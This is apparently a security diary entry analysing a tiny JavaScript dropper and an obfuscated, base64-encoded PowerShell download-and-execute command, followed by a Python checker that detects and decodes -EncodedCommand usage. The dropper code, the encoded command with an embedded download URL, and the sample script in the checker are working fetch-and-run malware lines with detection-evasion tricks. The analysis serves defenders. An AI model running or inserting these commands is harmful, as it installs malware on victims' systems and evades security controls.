Sometimes you may find very small pieces of malicious code. Yesterday, I caught this very small JavaScript sample with only 2 lines of code:

var d = new ActiveXObject("Shell.NormandApplication".replace("Normand", ""));
d.ShellExecute("PowerShell", "((New-Object System.Net.WebClient).DownloadFile('http://[redacted].exe', 'xwing.pif'));Start-Process 'xwing.pif'", "", "",
There is no real obfuscation here, just a trick to avoid detection of the string Shell.Application, which is often searched for by automated tools.
Sometimes, there is no need to implement complex code to bypass detection. A good example comes with PowerShell, as shown in the following command line:

poWERShElL.Exe -ExECutioNPolicy bYpAsS -NOPrOFiLe -WindOwsTyLe HiddEN -enCodEdCoMMANd \ IAAoAG4ARQB3AC0AbwBiAGoAZQBjAFQAIABTAHkAUwBUAGUAbQAuAE4AZQB0AC4AVwBFAGIAQwBsAG\ kARQBOAHQAKQAuAEQAbwB3AE4ATABvAGEARABGAEkAbABFACgAIAAdIGgAdAB0AHAAcwA6AC8ALwBh\ AHIAaQBoAGEAbgB0AHQAcgBhAGQAZQByAHMAbgBnAHAALgBjAG8AbQAvAGkAbQBhAGcAZQBzAC8AUw\ BjAGEAbgBfADIALgBlAHgAZQAdICAALAAgAB0gJABlAG4AdgA6AFQARQBtAFAAXABvAHUAdABwAHUA\ dAAuAGUAeABlAB0gIAApACAAOwAgAGkAbgBWAG8AawBFAC0ARQB4AFAAUgBlAHMAUwBJAG8ATgAgAB\ 0gJABFAE4AdgA6AHQARQBNAFAAXABvAHUAdABwAHUAdAAuAGUAeABlAB0g

The decoded command ends with:

inVokE-ExPResSIoN $ENv:tEMP\output.exe
Nothing fancy and easy to decode, but this trick will bypass most of the default security controls. A good idea is to fine-tune your regular expressions and filters to catch the -encodedcommand string (and ignore the case).
Note that the PE file is downloaded via HTTPS!
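As an added example (not code from the diary), here is a small Python checker for the detection advice above: it matches the -EncodedCommand flag regardless of case, including the abbreviations powershell.exe accepts for it (-e, -ec, -en, -enc, ...), decodes the UTF-16LE payload and reports which behaviours the decoded script calls. The sample command line, script and URL are constructed for the example.

```python
import base64
import re

# powershell.exe accepts any unambiguous prefix of a parameter name, so
# -e, -ec, -en, -enc, ... -encodedcommand all select -EncodedCommand.
_ABBREVS = ["e", "ec"] + ["encodedcommand"[:n] for n in range(2, 15)]
_FLAG_RE = re.compile(
    r"(?<![\w-])-(?:" + "|".join(sorted(_ABBREVS, key=len, reverse=True))
    + r")\s+([A-Za-z0-9+/=]{16,})",
    re.IGNORECASE,
)
# Behaviours worth a second look once the script is decoded (case-insensitive).
_SUSPICIOUS = ["DownloadFile", "DownloadString", "Invoke-Expression", "iex", "Start-Process"]


def find_encoded_commands(cmdline: str) -> list[str]:
    """Return every base64 blob passed via -EncodedCommand, whatever the spelling or case."""
    return _FLAG_RE.findall(cmdline)


def decode_encoded_command(payload: str) -> str:
    """The payload is base64 over UTF-16LE text, not UTF-8."""
    return base64.b64decode(payload).decode("utf-16-le")


def suspicious_tokens(script: str) -> list[str]:
    """Whole-word, case-insensitive hits against the decoded script."""
    return [t for t in _SUSPICIOUS
            if re.search(r"\b" + re.escape(t) + r"\b", script, re.IGNORECASE)]


def encode_for_powershell(script: str) -> str:
    """Build an -EncodedCommand argument the way PowerShell expects it (UTF-16LE, then base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def analyse(cmdline: str) -> dict:
    """Decode every encoded command on the line and report what each one contains."""
    decoded = [decode_encoded_command(p) for p in find_encoded_commands(cmdline)]
    return {"decoded": decoded, "hits": [suspicious_tokens(s) for s in decoded]}


# Constructed sample modelled on the diary's command line; the URL is a placeholder.
SAMPLE_SCRIPT = ("(New-Object System.Net.WebClient).DownloadFile('https://example.invalid/s.exe', "
                 "\"$env:TEMP\\out.exe\"); Invoke-Expression \"$env:TEMP\\out.exe\"")
SAMPLE_CMDLINE = ("poWERShElL.Exe -ExECutioNPolicy bYpAsS -NOPrOFiLe -WindOwsTyLe HiddEN -enC "
                  + encode_for_powershell(SAMPLE_SCRIPT))

if __name__ == "__main__":
    report = analyse(SAMPLE_CMDLINE)
    for script, hits in zip(report["decoded"], report["hits"]):
        print(f"{hits}: {script}")
```

Run the checker over process-creation logs rather than on the raw base64: -ExecutionPolicy starts with the same letters as -EncodedCommand but is not matched, so the filter stays precise.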
Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant